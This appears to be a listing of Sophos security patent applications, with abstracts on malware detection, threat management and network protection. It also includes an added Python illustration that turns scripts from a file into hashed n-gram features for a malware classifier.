Owner SOPHOS LIMITED (United Kingdom)
Inventor Harang, Richard

Abstract

In some embodiments, an apparatus includes a memory and a processor. The processor can be configured to extract a set of scripts from a potentially malicious file. The processor can further be configured to concatenate a representation of each script from the set of scripts with a representation of the remaining scripts from the set of scripts to define a script string. The processor can further be configured to define a feature vector based on a set of n-gram representations of the script string, for input of the feature vector to a neural network. The processor can further be configured to identify, based on the output from the neural network, a maliciousness classification of the file.
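The pipeline up to the neural network (script extraction, concatenation into one script string, n-gram feature vector) is shown below as an added example that is not Sophos's code. The HTML-style script extractor, the newline separator, character 3-grams and a 1024-wide feature-hashed vector are assumptions made for the demonstration; the neural network itself is out of scope, the vector is simply what would be fed to it.

```python
"""Scripts -> script string -> hashed n-gram feature vector (added illustration, not Sophos code)."""
import hashlib
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)


def extract_scripts(document):
    """Pull every inline <script> body out of an HTML-like document (toy extractor, assumption)."""
    return [m.group(1).strip() for m in SCRIPT_RE.finditer(document)]


def script_string(scripts, separator="\n"):
    """Concatenate each script with the remaining scripts of the set into one string."""
    return separator.join(scripts)


def hashed_ngrams(text, n=3, dim=1024):
    """Feature-hashed character n-gram counts: a fixed-width vector whatever the script length,
    so no vocabulary has to be shipped to the endpoint."""
    vec = [0] * dim
    for i in range(len(text) - n + 1):
        gram = text[i:i + n].encode("utf-8")
        idx = int.from_bytes(hashlib.blake2b(gram, digest_size=4).digest(), "little") % dim
        vec[idx] += 1
    return vec


def featurize(document, n=3, dim=1024):
    """Full pipeline: the returned vector is what the neural network would receive."""
    return hashed_ngrams(script_string(extract_scripts(document)), n, dim)


if __name__ == "__main__":
    # Constructed sample document with two inline scripts.
    doc = ("<html><script>alert(1)</script><p>x</p>"
           "<script type='text/javascript'>eval(atob('x'))</script></html>")
    vec = featurize(doc)
    print(len(extract_scripts(doc)), "scripts,", sum(vec), "trigrams hashed into", len(vec), "buckets")
```

Concatenating the scripts before featurising is deliberate: obfuscated loaders commonly split a payload across several small script blocks so that no single one looks suspicious, and the n-grams that span block boundaries are lost if each script is scored alone.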

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements

22.

DEFERRED MALWARE SCANNING

Application Number US2019061074
Publication Number 2020/106512
Status In Force
Filing Date 2019-11-13
Publication Date 2020-05-28
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Kenyon, Timothy Bruce
  • Hammack, Patrick, James

Abstract

A code segment executing on a compute instance may be identified as suspicious based on runtime behavior or similar behavioral analysis or the like. In order to ensure the identification and use of the most up-to-date identification and remediation tools, the compute instance may defer various remediation steps for an interval, during which the compute instance may wait for data updates from a threat management system. After the interval has passed, the compute instance may use any updated data or tools in order to address the code segment that triggered the initial malware detection.

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements

23.

INTRUSION DETECTION WITH HONEYPOT KEYS

Application Number US2019052925
Publication Number 2020/068959
Status In Force
Filing Date 2019-09-25
Publication Date 2020-04-02
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Schutz, Harald
  • Berger, Andreas
  • Humphries, Russell
  • Harris, Mark, D.
  • Ray, Kenneth, D.

Abstract

A honeypot file is cryptographically secured with a cryptographic key. The key, or related key material, is then placed on a central key store and the file is placed on a data store within the enterprise network. Unauthorized access to the honeypot file can then be detected by monitoring use of the associated key material, which usefully facilitates detection of file access at any time when, and from any location where, cryptographic access to the file is initiated.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol
  • H04W 12/12 - Detection or prevention of fraud

24.

ENTERPRISE NETWORK THREAT DETECTION

Application Number US2019046316
Publication Number 2020/046575
Status In Force
Filing Date 2019-08-13
Publication Date 2020-03-05
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Thomas, Andrew J.
  • Humphries, Russell
  • Saxe, Joshua Daniel
  • Reed, Simon Neil
  • Ray, Kenneth D.
  • Levy, Joseph H.
  • Ladnai, Beata
  • Harris, Mark David
  • Smith, Andrew G. P.
  • Ackerman, Karl
  • Russo, Mark Anthony

Abstract

In a threat management platform, a number of endpoints log events in an event data recorder. A local agent filters this data and feeds a filtered data stream to a central threat management facility. The central threat management facility can locally or globally tune filtering by local agents based on the current data stream, and can query local event data recorders for additional information where necessary or helpful in threat detection or forensic analysis. The central threat management facility also stores and deploys a number of security tools such as a web-based user interface supported by machine learning models to identify potential threats requiring human intervention and other models to provide human-readable context for evaluating potential threats.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol
  • G06F 21/55 - Detecting local intrusion or implementing counter-measures
  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements

25.

METHODS AND APPARATUS FOR MANAGEMENT OF A MACHINE-LEARNING MODEL TO ADAPT TO CHANGES IN LANDSCAPE OF POTENTIALLY MALICIOUS ARTIFACTS

Application Number GB2019052222
Publication Number 2020/030913
Status In Force
Filing Date 2019-08-07
Publication Date 2020-02-13
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Harang, Richard
  • Ducau, Felipe

Abstract

In some embodiments, an apparatus includes a memory and a processor. The processor can be configured to train a machine-learning (ML) model to output (1) an identification of whether an artifact is malicious and (2) a confidence value associated with the identification of whether the artifact is malicious. The processor can further be configured to receive a set of artifacts during a set of time periods, and provide a representation of each artifact from the set of artifacts as input to the ML model to obtain an output including an indication of whether that artifact is malicious and a confidence value associated with the indication. The processor can be further configured to calculate a confidence metric for each time period based on the confidence value associated with each artifact, and send an indication to retrain the ML model based on the confidence metric for at least one time period meeting a retraining criterion.

IPC Classes

  • G06N 3/04 - Architecture, e.g. interconnection topology
  • G06N 5/00 - Computing arrangements using knowledge-based models
  • G06N 20/20 - Ensemble learning
  • G06N 5/04 - Inference or reasoning models

26.

LOCALLY SECURING ENDPOINTS IN AN ENTERPRISE NETWORK USING REMOTE NETWORK RESOURCES

Application Number GB2019051191
Publication Number 2019/211592
Status In Force
Filing Date 2019-04-30
Publication Date 2019-11-07
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Watkiss, Neil Robert Tyndale
  • Kenning, Emile Marcus
  • Harris, Mark David

Abstract

A variety of techniques are employed to locally secure endpoints in the context of an enterprise network and remote network resources. For example, a threat management facility that remotely stores global reputation information for network content can be used in combination with a recognition engine such as a machine learning classifier that is locally deployed on endpoints within an enterprise network. Additionally, or alternatively, a security agent conditionally hooks a process for malware monitoring based on a persistent hook state for the process that may be stored, for example, in a process cache. When a process launches in a backoff state indicating that the process previously crashed after hooking, the security agent may further conditionally hook the process based on a reputation of the process or any other relevant contextual information.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol
  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
  • G06F 21/53 - Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity, buffer overflow or preventing unwanted data erasure by executing in a restricted environment, e.g. sandbox or secure virtual machine

27.

NETWORK SECURITY

Application Number US2019027320
Publication Number 2019/200317
Status In Force
Filing Date 2019-04-12
Publication Date 2019-10-17
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Levy, Joseph H.
  • Thomas, Andrew J.
  • Schiappa, Daniel Salvatore
  • Ray, Kenneth D.
  • Ackerman, Karl
  • Humphries, Russell

Abstract

A security platform that iteratively adapts to a changing security environment by creating and updating entity models based on observed activities and detecting patterns of events that deviate from these entity models.

IPC Classes

  • G06F 11/00 - Error detection; Error correction; Monitoring
  • G06F 21/00 - Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
  • G06F 21/50 - Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems

28.

SECURING ENDPOINTS IN A HETEROGENOUS ENTERPRISE NETWORK

Application Number US2019025710
Publication Number 2019/195502
Status In Force
Filing Date 2019-04-04
Publication Date 2019-10-10
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Grimm, Moritz, Daniel
  • Stutz, Daniel
  • Thomas, Andrew, J.
  • Ray, Kenneth, D.

Abstract

Endpoints within a subnet of a heterogeneous network are configured to cooperatively respond to internal or external notifications of compromise in order to protect the endpoints within the subnet and throughout the enterprise network. For example, each endpoint may be configured to self-isolate when a local security agent detects a compromise, and to shun one of the other endpoints in response to a corresponding notification of compromise in order to prevent the other, compromised endpoint from communicating with other endpoints and further compromising other endpoints either within the subnet or throughout the enterprise network.

IPC Classes

  • H04L 12/24 - Arrangements for maintenance or administration
  • H04L 29/08 - Transmission control procedure, e.g. data link level control procedure

29.

METHODS AND APPARATUS FOR IDENTIFYING THE SHARED IMPORTANCE OF MULTIPLE NODES WITHIN A MACHINE LEARNING MODEL FOR MULTIPLE TASKS

Application Number IB2019051629
Publication Number 2019/166989
Status In Force
Filing Date 2019-02-28
Publication Date 2019-09-06
Owner SOPHOS LIMITED (United Kingdom)
Inventor Harang, Richard

Abstract

In some embodiments, a method includes providing an indication of a first file having a first characteristic to a neural network and receiving a classification associated with the first file from the neural network. The method includes providing an indication of a second file having a second characteristic to the neural network and receiving a classification associated with the second file from the neural network. The method further includes calculating a shared importance value for each node from a set of nodes in the neural network. The shared importance value indicates an amount to which that node is used to produce both the classification associated with the first file and the classification associated with the second file. The method further includes modifying the neural network based on the shared importance for at least one node from the set of nodes.

IPC Classes

30.

MANAGING VIRTUAL MACHINE SECURITY RESOURCES

Application Number GB2019050381
Publication Number 2019/158915
Status In Force
Filing Date 2019-02-13
Publication Date 2019-08-22
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Thomas, Andrew J.
  • Bell, Chloe
  • Allsworth, Robert William
  • Gill, Mark Andrew
  • Cobley, Timothy Edward
  • Mcging, Trevor Neil
  • Allamenou, Daphne Kyriaki
  • Piper, Andrew Colin

Abstract

In a virtualized environment where multiple guest virtual machines receive security services from multiple security virtual machines, a guest virtual machine automatically transitions to a new security virtual machine under various conditions. For example, the guest virtual machine may select a new security virtual machine when connectivity to the current security virtual machine degrades below a predetermined threshold, or in response to a request from the current security virtual machine indicating, e.g., that the current security virtual machine is about to shut down or otherwise terminate security services to the guest virtual machine.

IPC Classes

  • G06F 9/50 - Allocation of resources, e.g. of the central processing unit [CPU]
  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
  • G06F 9/455 - Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines

31.

PROCESSING NETWORK TRAFFIC BASED ON ASSESSED SECURITY WEAKNESSES

Application Number US2019013823
Publication Number 2019/156786
Status In Force
Filing Date 2019-01-16
Publication Date 2019-08-15
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Epple, Scott, Mcvicker
  • Jesse, Jonathan

Abstract

A threat management facility generates a simulated phishing threat based on one or more characteristics of users of an enterprise network and transmits the simulated phishing threat to the users of the enterprise network. Based on whether a user fails to respond appropriately to the simulated phishing threat, the threat management facility may adjust a profile of the user. Network traffic to and from an endpoint associated with the user may be processed according to the adjusted profile.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol

32.

METHODS AND APPARATUS FOR IDENTIFYING AN IMPACT OF A PORTION OF A FILE ON MACHINE LEARNING CLASSIFICATION OF MALICIOUS CONTENT

Application Number GB2019050199
Publication Number 2019/150079
Status In Force
Filing Date 2019-01-23
Publication Date 2019-08-08
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Harang, Richard
  • Saxe, Joshua Daniel

Abstract

In other embodiments, a non-transitory processor-readable medium stores code representing instructions to be executed by a processor. The code includes code to cause the processor to receive a structured file for which a machine learning model has made a malicious content classification. The code further includes code to remove a portion of the structured file to define a modified structured file that follows a format associated with a type of the structured file. The code further includes code to extract a set of features from the modified structured file. The code further includes code to provide the set of features as an input to the machine learning model to produce an output. The code further includes code to identify an impact of the portion of the structured file on the malicious content classification of the structured file based on the output.

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
  • G06N 20/00 - Machine learning

33.

MANAGING ADMISSION OF UNRECOGNIZED DEVICES ONTO AN ENTERPRISE NETWORK

Application Number US2019015831
Publication Number 2019/152505
Status In Force
Filing Date 2019-01-30
Publication Date 2019-08-08
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Shaw, John, Tyrone
  • Mckerchar, Ross
  • Grimm, Moritz, Daniel
  • Weber, Jan Karl, Heinrich
  • Talati, Shail, R.
  • Ray, Kenneth, D.
  • Thomas, Andrew, J.

Abstract

A threat management facility detects a device on an enterprise network and determines whether the device is one of a set of managed devices for the enterprise network. When the device is not one of the set of managed devices, the threat management facility may selectively direct the device to a portal that manages admission of unrecognized devices onto the enterprise network. As the user interacts with the portal or based on a response of the unrecognized device to the portal, the portal may manage admission of unrecognized devices onto the enterprise network while making efficient use of network administrator resources.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol

34.

METHODS AND APPARATUS FOR DETECTION OF MALICIOUS DOCUMENTS USING MACHINE LEARNING

Application Number IB2019050642
Publication Number 2019/145912
Status In Force
Filing Date 2019-01-25
Publication Date 2019-08-01
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Saxe, Joshua Daniel
  • Rudd, Ethan M.
  • Harang, Richard

Abstract

An apparatus for detecting malicious files includes a memory and a processor communicatively coupled to the memory. The processor receives multiple potentially malicious files. A first potentially malicious file has a first file format, and a second potentially malicious file has a second file format different from the first file format. The processor extracts a first set of strings from the first potentially malicious file, and extracts a second set of strings from the second potentially malicious file. First and second feature vectors are defined based on the lengths of each string from the associated set of strings. The processor provides the first feature vector as an input to a machine learning model to produce a maliciousness classification of the first potentially malicious file, and provides the second feature vector as an input to the machine learning model to produce a maliciousness classification of the second potentially malicious file.

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
  • G06N 20/00 - Machine learning

35.

MALWARE DETECTION USING MACHINE LEARNING

Application Number US2019012709
Publication Number 2019/136444
Status In Force
Filing Date 2019-01-08
Publication Date 2019-07-11
Owner SOPHOS LIMITED (United Kingdom)
Inventor Levy, Joseph, H.

Abstract

Synthetic training sets for machine learning are created by identifying and modifying functional features of code in an existing malware training set. By filtering the resulting synthetic code to measure malware impact and novelty, training sets can be created that predict novel malware and seek to preemptively exhaust the space of new malware. These synthesized training sets can be used in turn to improve training of machine learning models. Furthermore, by repeating the process of new code generation, filtering and training, an iterative machine learning process may be created that continuously narrows the window of vulnerability to new malicious actions.

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
  • H04L 29/06 - Communication control; Communication processing characterised by a protocol

36.

ELECTRONIC MAIL SECURITY USING A USER-BASED INQUIRY

Application Number GB2018053644
Publication Number 2019/122832
Status In Force
Filing Date 2018-12-17
Publication Date 2019-06-27
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Thomas, Andrew J.
  • Mitchell, David James
  • Murray, Paul Stuart

Abstract

Electronic communications passing through a communication gateway or similar device for an enterprise can be monitored for indicators of malicious activity. When potentially malicious activity is identified, a user-based inquiry can be employed to identify potential sources of the malicious activity within the enterprise network. More specifically, by identifying a user that sourced the communication, instead of or in addition to a network address, devices within the enterprise network associated with the user can be located, analyzed, and remediated as appropriate.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol
  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
  • G06F 21/55 - Detecting local intrusion or implementing counter-measures

37.

SYSTEM AND METHOD FOR PROVIDING A SECURE VLAN WITHIN A WIRELESS NETWORK

Application Number US2018057611
Publication Number 2019/084340
Status In Force
Filing Date 2018-10-25
Publication Date 2019-05-02
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Kaushik, Anil
  • Basu, Richikesh
  • Kiran, Dharani, Pragada, Kranthi
  • Narasimha, Sathwith, Gopady

Abstract

Methods, systems and computer readable media for secure VLAN within a wireless network are described.

IPC Classes

38.

ACCESS POINT REGISTRATION IN A NETWORK

Application Number GB2018052361
Publication Number 2019/058094
Status In Force
Filing Date 2018-08-20
Publication Date 2019-03-28
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Biedermann, Balthasar
  • Bolte, Dirk
  • Huang, Ye

Abstract

Implementations generally relate to methods, systems, and computer readable media for providing automatic access point registration. In some implementations, a method includes receiving an indication of automatic device onboarding activation. The method further includes receiving a selection of one or more reference devices. The method further includes determining one or more detectable devices among the one or more candidate devices to be onboarded that are detectable by at least one of the one or more reference devices. The method further includes obtaining one or more automatic configuration parameters from one or more of the reference devices. The method further includes configuring one or more of the detectable devices to be onboarded with the one or more automatic configuration parameters.

IPC Classes

39.

ENDPOINT SECURITY

Application Number US2018045726
Publication Number 2019/055157
Status In Force
Filing Date 2018-08-08
Publication Date 2019-03-21
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Kraft, Chris Douglas
  • Teal, Richard S.

Abstract

An enterprise security system is improved by managing network flows based on an application type. When a network message having an unknown application type is received at a gateway, firewall, or other network device/service from an endpoint, the endpoint that originated the network message may be queried for identifying information for the source of the network message and the application type may be determined, or the endpoint may periodically communicate application type information to the network device in a heartbeat or other periodic communication or the like. The network message may be managed along with other network traffic according to the application type. In another aspect, an endpoint can protect computing objects on the endpoint against tampering with a secure cache in the kernel space of the endpoint operating system.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol

40.

REALTIME EVENT DETECTION

Application Number GB2018052520
Publication Number 2019/048858
Status In Force
Filing Date 2018-09-06
Publication Date 2019-03-14
Owner SOPHOS LIMITED (United Kingdom)
Inventor Waghorn, William David

Abstract

An event handler implements a state machine or similar construct for processing of complex event chains as incremental events are detected. This approach advantageously limits processing to monitoring for and responding to a next event in a sequence of events, and supports complex event detection in a manner that scales efficiently in time and computation.

IPC Classes

  • G06F 21/55 - Detecting local intrusion or implementing counter-measures
  • H04L 12/26 - Monitoring arrangements; Testing arrangements
  • H04L 29/06 - Communication control; Communication processing characterised by a protocol
  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements

41.

THREAT INDEX BASED WLAN SECURITY AND QUALITY OF SERVICE

Application Number GB2018051988
Publication Number 2019/012288
Status In Force
Filing Date 2018-07-12
Publication Date 2019-01-17
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Shanmugavadivel, Senthilraj
  • Bolte, Dirk
  • Talati, Shail

Abstract

Implementations generally relate to methods, systems, and computer readable media for providing threat index based wireless local area network (WLAN) security and quality of service. In one implementation, a method includes receiving a request from a client device connected to a network via a network link. The method further includes determining a threat index value for the client device. The method further includes determining one or more security policies associated with one or more respective network resources, where each security policy applies one or more rules for allocating one of the network resources. The method further includes determining allocation of one or more of the network resources to the client device based on the one or more security policies and the threat index value.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol
  • H04W 72/04 - Wireless resource allocation
  • H04W 12/12 - Detection or prevention of fraud
  • H04W 12/08 - Access security

42.

DETECTING IOT SECURITY ATTACKS USING PHYSICAL COMMUNICATION LAYER CHARACTERISTICS

Application Number GB2018051265
Publication Number 2018/206965
Status In Force
Filing Date 2018-05-10
Publication Date 2018-11-15
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Kaushik, Anil
  • Stutz, Daniel

Abstract

Methods, systems and computer readable media for protecting networks and devices from network security attack using physical communication layer characteristics are described.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol
  • H04W 12/12 - Detection or prevention of fraud
  • H04L 29/08 - Transmission control procedure, e.g. data link level control procedure

43.

SANDBOX ENVIRONMENT FOR DOCUMENT PREVIEW AND ANALYSIS

Application Number US2016040135
Publication Number 2018/004572
Status In Force
Filing Date 2016-06-29
Publication Date 2018-01-04
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Schiappa, Daniel, Salvatore
  • Ray, Kenneth, D.
  • Mckerchar, Ross
  • Thomas, Andrew, J.
  • Humphries, Russell
  • Shaw, John, Edward Tyrone

Abstract

Attachments or other documents can be transmitted to a sandbox environment where they can be concurrently opened for remote preview from an endpoint and scanned for possible malware. A gateway or other intermediate network element may enforce this process by replacing attachments, e.g., in incoming electronic mail communications, with links to a document preview hosted in the sandbox environment.

IPC Classes

  • G06F 21/51 - Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems at application loading time, e.g. accepting, rejecting, starting or inhibiting executable software based on integrity or source reliability
  • G06F 21/53 - Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity, buffer overflow or preventing unwanted data erasure by executing in a restricted environment, e.g. sandbox or secure virtual machine
  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements

44.

PROACTIVE NETWORK SECURITY USING A HEALTH HEARTBEAT

Application Number US2016040397
Publication Number 2018/004600
Status In Force
Filing Date 2016-06-30
Publication Date 2018-01-04
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Ray, Kenneth, D.
  • Thomas, Andrew, J.
  • Ackerman, Karl
  • Stutz, Daniel
  • Bean, James Douglas
  • Shaw, John Edward, Tyrone
  • Paradis, Craig

Abstract

An endpoint in a network periodically generates a heartbeat encoding health state information and transmits this heartbeat to other network entities. Recipients of the heartbeat may use the health state information to independently make decisions about communications with the source endpoint, for example, by isolating the endpoint to prevent further communications with other devices sharing the network with the endpoint. Isolation may be coordinated by a firewall or gateway for the network, or independently by other endpoints that receive a notification of the compromised health state.

IPC Classes

  • G06F 11/00 - Error detection; Error correction; Monitoring

45.

DETECTING TRIGGERING EVENTS FOR DISTRIBUTED DENIAL OF SERVICE ATTACKS

Application Number US2016040094
Publication Number 2017/184189
Status In Force
Filing Date 2016-06-29
Publication Date 2017-10-26
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Ackerman, Karl
  • Harris, Mark, David
  • Reed, Simon, Neil
  • Thomas, Andrew, J.
  • Ray, Kenneth, D.
  • Stutz, Daniel
  • Howard, Fraser
  • Samosseiko, Dmitri

Abstract

An endpoint in an enterprise network is monitored, and when a potential trigger for a distributed denial of service (DDoS) attack is followed by an increase in network traffic from the endpoint to a high reputation network address, the endpoint is treated as a DDoS service bot and isolated from the network until remediation can be performed.

IPC Classes

  • G06F 11/30 - Monitoring
  • G06F 15/16 - Combinations of two or more digital computers each having at least an arithmetic unit, a program unit and a register, e.g. for a simultaneous processing of several programs
  • G06F 21/00 - Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
  • H04L 9/32 - Arrangements for secret or secure communications; Network security protocols including means for verifying the identity or authority of a user of the system
  • H04L 12/24 - Arrangements for maintenance or administration
  • H04L 12/26 - Monitoring arrangements; Testing arrangements

46.

FORENSIC ANALYSIS OF COMPUTING ACTIVITY AND MALWARE DETECTION USING AN EVENT GRAPH

Application Number US2017027070
Publication Number 2017/180666
Status In Force
Filing Date 2017-04-11
Publication Date 2017-10-19
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Ladnai, Beata
  • Harris, Mark, David
  • Thomas, Andrew, J.
  • Smith, Andrew, G.P.
  • Humphries, Russell
  • Ray, Kenneth, D.

Abstract

A data recorder stores endpoint activity on an ongoing basis as sequences of events that causally relate computer objects such as processes and files. When a security event is detected, an event graph may be generated based on these causal relationships among the computing objects. For a root cause analysis, the event graph may be traversed in a reverse order from the point of an identified security event (e.g., a malware detection event) to preceding computing objects, while applying one or more cause identification rules to identify a root cause of the security event. Once a root cause is identified, the event graph may be traversed forward from the root cause to identify other computing objects that are potentially compromised by the root cause. Further, patterns within the event graph can be used to detect the presence of malware on the endpoint.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol
  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
  • G06F 11/30 - Monitoring
  • G06F 9/44 - Arrangements for executing specific programs

47.

ENCRYPTION TECHNIQUES

Application Number US2016038020
Publication Number 2017/138976
Status In Force
Filing Date 2016-06-17
Publication Date 2017-08-17
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Ray, Kenneth, D.
  • Thomas, Andrew, J.
  • Merry, Anthony, John
  • Schutz, Harald
  • Berger, Andreas
  • Shaw, John, Edward, Tyrone
  • Ortner, Stefan
  • Vanbiervliet, Vincent
  • Gruber, Norbert
  • Hein, Markus
  • Wintersberger, Gerald
  • Wenzel, Artur
  • Humphries, Russell
  • Sullivan, Gordon

Abstract

A portable encryption format wraps encrypted files in a self-executing container that facilitates transparent, identity-based decryption for properly authenticated users while also providing local password access to wrapped files when identity-based decryption is not available.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol

48.

MITIGATION OF ANTI-SANDBOX MALWARE TECHNIQUES

Application Number GB2016053221
Publication Number 2017/068334
Status In Force
Filing Date 2016-10-18
Publication Date 2017-04-27
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Harris, Mark David
  • Stutz, Daniel
  • Lynch, Vincent Kevin
  • Kraft, Chris Douglas

Abstract

Static analysis is applied to unrecognized software objects in order to identify and address potential anti-sandboxing techniques. Where static analysis suggests the presence of any such corresponding code, the software object may be forwarded to a sandbox for further analysis. In another aspect, multiple types of sandboxes may be provided, with the type being selected according to the type of exploit suggested by the static analysis.

IPC Classes

  • G06F 21/53 - Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity, buffer overflow or preventing unwanted data erasure by executing in a restricted environment, e.g. sandbox or secure virtual machine
  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements

49.

MONITORING VARIATIONS IN OBSERVABLE EVENTS FOR THREAT DETECTION

Application Number GB2015053676
Publication Number 2016/097686
Status In Force
Filing Date 2015-12-02
Publication Date 2016-06-23
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Ray, Kenneth D.
  • Harris, Mark D.
  • Reed, Simon Neil
  • Watkiss, Neil Robert Tyndale
  • Thomas, Andrew J.

Abstract

Threat detection is improved by monitoring variations in observable events and correlating these variations to malicious activity. The disclosed techniques can be usefully employed with any attribute or other metric that can be instrumented on an endpoint and tracked over time including observable events such as changes to files, data, software configurations, operating systems, and so forth. Correlations may be based on historical data for a particular machine, or a group of machines such as similarly configured endpoints. Similar inferences of malicious activity can be based on the nature of a variation, including specific patterns of variation known to be associated with malware and any other unexpected patterns that deviate from normal behavior. Embodiments described herein use variations in, e.g., server software updates or URL cache hits on an endpoint, but the techniques are more generally applicable to any endpoint attribute that varies in a manner correlated with malicious activity.

IPC Classes

  • G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements

50.

A METHOD AND SYSTEM FOR NETWORK ACCESS CONTROL BASED ON TRAFFIC MONITORING AND VULNERABILITY DETECTION USING PROCESS RELATED INFORMATION

Application Number GB2015054072
Publication Number 2016/097757
Status In Force
Filing Date 2015-12-18
Publication Date 2016-06-23
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Mahadevia, Jimit Hareshkumar
  • Dave, Shalvi D.
  • Trivedi, Bhushan H.

Abstract

Disclosed are various embodiments of a method and system for network access control. The method may involve traffic monitoring and vulnerability detection using process information. The system may analyze the vulnerability as a process malfunctioning, where preventive action focuses on process blocking as opposed to host blocking, which can lead to improved performance and productivity of a network. Techniques may use process related information, connection information, and network packet information for network control. The information may be matched against a plurality of signatures to identify and detect a known vulnerability in network activities. On the basis of a match, a verification report may be established. Techniques may further check whether a verification report is applicable to a process associated with a network packet and allow or block the process running on the host based on the report.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol
  • G06F 21/55 - Detecting local intrusion or implementing counter-measures

51.

LABELING COMPUTING OBJECTS FOR IMPROVED THREAT DETECTION

Application Number GB2015052656
Publication Number 2016/038397
Status In Force
Filing Date 2015-09-14
Publication Date 2016-03-17
Owner SOPHOS LIMITED (United Kingdom)
Inventor
  • Thomas, Andrew J.
  • Harris, Mark D.
  • Reed, Simon Neil
  • Watkiss, Neil Robert Tyndale
  • Ray, Kenneth D.
  • Cook, Robert, W.
  • Samosseiko, Dmitri
  • Schutz, Harald
  • Shaw, John Edward Tyrone
  • Merry, Anthony John
  • Schiappa, Daniel Salvatore

Abstract

Threat detection instrumentation is simplified by providing and updating labels for computing objects in a context-sensitive manner. This may include simple labeling schemes to distinguish between objects, e.g., trusted/untrusted processes or corporate/private data. This may also include more granular labeling schemes such as a three-tiered scheme that identifies a category (e.g., financial, e-mail, game), static threat detection attributes (e.g., signatures, hashes, API calls), and explicit identification (e.g., what a file or process calls itself). By tracking such data for various computing objects and correlating these labels to malware occurrences, rules can be written for distribution to endpoints to facilitate threat detection based on, e.g., interactions of labeled objects, changes to object labels, and so forth. In this manner, threat detection based on complex interactions of computing objects can be characterized in a platform independent manner and pre-processed on endpoints without requiring significant communications overhead with a remote threat management facility.

IPC Classes

  • H04L 29/06 - Communication control; Communication processing characterised by a protocol